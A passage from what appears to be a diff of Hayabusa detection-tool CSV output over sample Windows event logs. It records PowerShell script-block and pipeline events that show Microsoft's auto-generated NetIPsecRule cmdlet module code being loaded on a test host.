[Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' -Alias '*' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.082 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.082 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.083 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.083 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.083 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Find-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.084 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.084 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.085 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.085 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.091 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.091 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.092 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.092 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Sync-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.092 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Update-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
